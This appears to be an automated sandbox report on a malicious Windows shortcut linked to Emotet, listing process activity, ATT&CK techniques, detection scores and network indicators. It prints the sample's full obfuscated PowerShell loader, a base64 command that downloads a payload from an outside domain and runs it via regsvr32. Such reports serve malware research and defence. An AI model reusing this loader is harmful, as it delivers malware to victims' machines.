Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1 ; powershell -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1; Remove-Item C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1
@{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Pester.psm1'
# Version number of this module.
ModuleVersion = '3.4.0'
# ID used to uniquely identify this module
GUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'
# Author of this module
Author = 'Pester Team'
# Company or vendor of this module
CompanyName = 'Pester'
# Copyright statement for this module
Copyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'
# Description of the functionality provided by this module
Description = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts.
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'
# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'
# Functions to export from this module
FunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')
# # Cmdlets to export from this module
# CmdletsToExport = '*'
# Variables to export from this module
VariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')
# # Aliases to export from this module
# AliasesToExport = '*'
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
PrivateData = @{
 # PSData is module packaging and gallery metadata embedded in PrivateData
 # It's for rebuilding Pow
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1589
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8299
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1189
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8667
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6432 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364 | Thread sleep count: 1189 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364 | Thread sleep count: 8667 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: svchost.exe, 00000003.00000002.2436735024.000001BD5F065000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2436387849.000001BD5F047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2432084247.000001BD5DA30000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1274351518.0000027B9B705000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command out-string -inputobject "srw735125373wm.lnk " | out-null; [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('jfbyb2dyzxnzuhjlzmvyzw5jzt0iu2lszw50bhldb250aw51zsi7svdsigh0dha6ly9mb2n1c21lzgljys5pbi9mbwxpyi9jeejbqk1omekyy0xnm3fxmudwdi8glu91dezpbgugjgvudjpuru1ql3puc3jqzwnyvmiuze1vo1jlz3n2cjmylmv4zsakzw52olrftvavem5zclbly1hwyi5ktw8=')) > "c:\users\user\appdata\local\temp\gjrzeyudtv.ps1" ; powershell -executionpolicy bypass -file "c:\users\user\appdata\local\temp\gjrzeyudtv.ps1"; remove-item "c:\users\user\appdata\local\temp\gjrzeyudtv.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
MITRE ATT&CK matrix, listed per tactic (the number the report shows in front of a technique is kept in parentheses):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Command and Scripting Interpreter (1), PowerShell (3), At, Cron, Launchd, Scheduled Task
Persistence: Registry Run Keys / Startup Folder (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (11), Registry Run Keys / Startup Folder (1), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (31), Process Injection (11), Software Packing (1), DLL Side-Loading (1), Steganography
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (11), Process Discovery (11), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (21)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (13), Protocol Impersonation, Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Source | Detection | Scanner | Label
DRlFlg7OV8.lnk | 62% | Virustotal |
DRlFlg7OV8.lnk | 67% | ReversingLabs | Shortcut.Downloader.Powdow
DRlFlg7OV8.lnk | 100% | Avira | LNK/Runner.R
DRlFlg7OV8.lnk | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png.1 | 0% | Avira URL Cloud | safe
http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/ | 0% | Avira URL Cloud | safe
http://focusmedica.in | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
focusmedica.in | 166.62.28.147 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1305717837.000001A863082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A8716D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A871813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B93134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84900000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html.1 | powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod-C: | edb.log.3.dr | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.1305717837.000001A862292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B83BB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2-C: | svchost.exe, 00000003.00000003.1202965974.000001BD63262000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1305717837.000001A863082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A8716D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A871813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B93134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84900000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000003.00000002.2436735024.000001BD5F065000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://focusmedica.in | powershell.exe, 00000004.00000002.1252433128.0000027B842E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84574000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1305717837.000001A861661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B82F81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1305717837.000001A861661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B82F81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester.1 | powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png.1 | powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
166.62.28.147 | focusmedica.in | United States | | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

IP
127.0.0.1
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1583270
Start date and time:2025-01-02 10:03:58 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 7s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:DRlFlg7OV8.lnk
renamed because original name is a hash value
Original Sample Name:09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924.lnk
Detection:MAL
Classification:mal100.evad.winLNK@7/12@1/2
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 4.175.87.197
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
Time | Type | Description
04:04:32 | API Interceptor | 2x Sleep call for process: svchost.exe modified
04:04:32 | API Interceptor | 69x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
166.62.28.147 | 2022-04-26_1045.exe.lnk | Get hash | malicious | Emotet | Browse | focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
focusmedica.in | 2022-04-26_1045.exe.lnk | Get hash | malicious | Emotet | Browse | 166.62.28.147

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS-26496-GO-DADDY-COM-LLCUS | arm7.elf | Get hash | malicious | Mirai, Moobot | Browse | 192.169.229.195
 | db0fa4b8db0333367e9bda3ab68b8042.i686.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 148.72.251.75
 | https://chamberoflearning.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU1uZ3phbkk9JnVpZD1VU0VSMTcxMjIwMjRVNTkxMjE3Mjk=N0123NCA_A8_CHF@emfa.pt | Get hash | malicious | Unknown | Browse | 216.69.174.68
 | https://www.gglusa.us/ | Get hash | malicious | Unknown | Browse | 68.178.157.109
 | armv7l.elf | Get hash | malicious | Mirai | Browse | 192.186.210.173
 | armv6l.elf | Get hash | malicious | Unknown | Browse | 68.178.185.215
 | nabarm7.elf | Get hash | malicious | Unknown | Browse | 198.71.185.150
 | arm7.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 208.109.47.104
 | https://www.asda.com@hnvs.xyz/asda-christmas-prizes | Get hash | malicious | Unknown | Browse | 198.12.239.74
 | https://disruptivc-dot-yamm-track.appspot.com/Redirect?ukey=1-0q8XPD2_exH3GZm9N9GPlcuW7DeTrX4WZWK6ta6DkQ-0&key=YAMMID-76523483&link=https://construction-sealants-ltd.jimdosite.com | Get hash | malicious | HTMLPhisher | Browse | 118.139.179.98
                                    No context
                                    No context
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7945862157861534
                                    Encrypted:false
                                    SSDEEP:3072:yJjAgNE4Pj5vHcjTcyBP9UjaaQ/ka4qWv:QAgN8nj/ka4
                                    MD5:ED127F28B4E44FA62295725A5EDD88A1
                                    SHA1:0F0E7A1150C3D3D6D8B46E256E761A44A040A22E
                                    SHA-256:F7E6D5B24F75CF4CF1F44228985B84E890153C0731AB48F520A3138B562DBA0C
                                    SHA-512:2EF317CD32B9621EECC8415254120723D038DD4B543E11376F9B8C158C256E6A58ED558B71BA77234442183E4F2937B2434A82315C20D79287BF53DC406E0C54
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb78dd798, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7864250612954311
                                    Encrypted:false
                                    SSDEEP:1536:DSB2ESB2SSjlK/6vDfi5Wy10MctJ+t9ka4XQ0/Ykr3g16L2UPkLk+kyt4eCu3uZB:Dazaovh7uka4Es2U1RFNp3pvHzrHBHz
